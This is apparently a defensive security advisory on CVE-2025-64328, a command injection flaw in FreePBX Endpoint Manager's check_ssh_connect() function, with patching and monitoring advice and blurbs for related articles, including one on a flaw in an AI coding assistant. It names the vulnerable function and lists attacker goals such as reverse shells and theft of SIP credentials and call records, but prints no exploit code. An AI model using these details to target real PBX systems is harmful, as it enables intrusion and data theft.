Key Takeaway
CVE-2025-64328 is a post-authentication OS command injection vulnerability in Sangoma FreePBX Endpoint Manager, specifically within the testconnection check_ssh_connect() function. Authenticated attackers can execute arbitrary system commands as the asterisk user, gaining remote code execution on the PBX host. CISA has added this flaw to the KEV catalog with a federal patch deadline of February 24, 2026.
CVE-2025-64328: Sangoma FreePBX Endpoint Manager OS Command Injection Enables Remote Code Execution
Affected Product: Sangoma FreePBX Endpoint Manager CVE ID: CVE-2025-64328 Vulnerability Type: OS Command Injection (CWE-78) Attack Vector: Network, Post-Authentication CISA KEV Patch Deadline: 2026-02-24
Vulnerability Details
Sangoma FreePBX Endpoint Manager contains an OS command injection vulnerability in the testconnection → check_ssh_connect() function. An authenticated user with valid FreePBX credentials can inject arbitrary operating system commands through this function, which fails to properly sanitize user-supplied input before passing it to the underlying system shell.
The flaw is post-authentication, meaning an attacker must first possess valid credentials to exploit it. However, this does not substantially limit the attack surface in environments where FreePBX administrative accounts are shared, weakly protected, or exposed to insider threats. FreePBX deployments frequently run in SMB and enterprise telephony environments where administrative credential hygiene is inconsistent.
Successful exploitation allows command execution under the asterisk user context — the service account that runs Asterisk, the open-source PBX engine underpinning FreePBX. While this is not root-level access by default, the asterisk user typically has read access to call detail records, SIP credentials, voicemail data, and dial plan configurations. Depending on system configuration, privilege escalation from asterisk to root may be achievable through secondary misconfigurations.
Real-World Impact
FreePBX powers a significant portion of self-hosted VoIP infrastructure globally, and Sangoma's Endpoint Manager is a widely deployed add-on module used to manage IP phone provisioning and connectivity. Organizations running FreePBX on-premises — including healthcare providers, legal firms, financial services companies, and managed service providers — are directly exposed.
An attacker exploiting CVE-2025-64328 can:
- Execute arbitrary commands on the host system as the
asteriskuser - Access SIP trunk credentials and internal extension configurations
- Exfiltrate call detail records and voicemail audio files
- Pivot laterally within the network from a compromised PBX host
- Establish persistent remote access via reverse shells or dropped SSH keys
FreePBX systems are frequently internet-facing, either directly or through exposed administrative portals, which increases the likelihood that compromised credentials could be obtained through phishing, credential stuffing, or prior data breaches before this vulnerability is weaponized.
CISA has added CVE-2025-64328 to the Known Exploited Vulnerabilities (KEV) catalog and mandates that federal civilian executive branch (FCEB) agencies apply mitigations by February 24, 2026. Non-federal organizations should treat this deadline as a reference benchmark rather than a ceiling.
Patching and Mitigation Guidance
1. Apply the Sangoma Security Patch Inventory all FreePBX Endpoint Manager deployments immediately. Apply the latest Sangoma-issued security update as soon as it is available through the FreePBX Module Admin interface or Sangoma's official update channels. Verify patch application by checking the installed module version against Sangoma's published advisory.
2. Restrict Administrative Access Lock down FreePBX administrative interfaces. Remove public internet exposure of the FreePBX web GUI where not operationally required. Place administrative access behind a VPN or restrict it to known management IP ranges using firewall ACLs or iptables rules.
3. Enforce Strong Authentication Audit all FreePBX user accounts. Remove stale or shared accounts. Enforce strong, unique passwords for all administrative users. Enable multi-factor authentication on the FreePBX administrative portal if your deployment supports it or if a supporting module is available.
4. Monitor for Exploitation Indicators
Configure your SIEM to alert on anomalous process execution originating from the asterisk user, particularly shell spawning, outbound network connections from PBX processes, and access to sensitive configuration files outside normal operational patterns. Review /var/log/asterisk/ and system auth logs for unusual activity.
5. Audit Endpoint Manager Usage If Endpoint Manager is not actively in use, disable or uninstall the module through FreePBX Module Admin to eliminate the attack surface entirely until a patch is confirmed applied and validated.
Summary Table
| Field | Detail |
|---|---|
| CVE ID | CVE-2025-64328 |
| Vendor | Sangoma |
| Product | FreePBX Endpoint Manager |
| Flaw Type | OS Command Injection |
| Attack Vector | Network, Authenticated |
| Impact | Remote Code Execution as asterisk user |
| CISA KEV Deadline | February 24, 2026 |
Organizations running Sangoma FreePBX should treat this vulnerability as high priority given the sensitive data processed by PBX systems and the availability of the CISA KEV designation as a signal of active or expected exploitation.
Original Source
CISA KEV
Related Articles
CVE Pending: Critical Vulnerability in Anthropic's Claude Code Discovered Days After Source Code Leak
Adversa AI discovered a critical vulnerability in Anthropic's Claude Code agentic coding assistant within days of Anthropic accidentally leaking the product's source code. Claude Code operates with elevated system privileges in developer environments, making exploitation potentially severe — including credential theft, CI/CD pipeline manipulation, and lateral movement. Organizations should audit deployments, rotate credentials, and apply patches immediately once Anthropic releases a fix.
CVE-2024-6387: OpenSSH regreSSHion RCE Flaw Exposes Millions of Linux Servers to Unauthenticated Root Access
CVE-2024-6387 (regreSSHion) is a signal handler race condition in OpenSSH sshd versions 8.5p1 through 9.7p1 that allows unauthenticated remote code execution as root. Discovered by Qualys, the flaw affects an estimated 700,000 publicly exposed servers. Administrators should upgrade to OpenSSH 9.8p1 immediately or set LoginGraceTime 0 as a temporary workaround.
Apple Expands DarkSword Exploit Kit Mitigations Across Device Fleet After State-Sponsored and Spyware Vendor Abuse
Apple has expanded mitigations against the DarkSword exploit kit to additional devices after the toolkit was used in operations by state-sponsored threat groups and commercial spyware vendors. The expansion follows Apple's standard model of phased protection rollouts across its device ecosystem. All Apple device owners should apply the latest OS updates immediately, and high-risk individuals should enable Lockdown Mode.
CVE-2026-20093: Critical Cisco IMC Authentication Bypass Carries CVSS 9.8
Cisco has patched CVE-2026-20093, a critical authentication bypass vulnerability in the Cisco Integrated Management Controller (IMC) with a CVSS score of 9.8. An unauthenticated remote attacker can exploit the flaw to bypass authentication and gain elevated privileges over affected hardware management interfaces. Administrators should apply Cisco's patch immediately and restrict IMC network access to isolated management VLANs.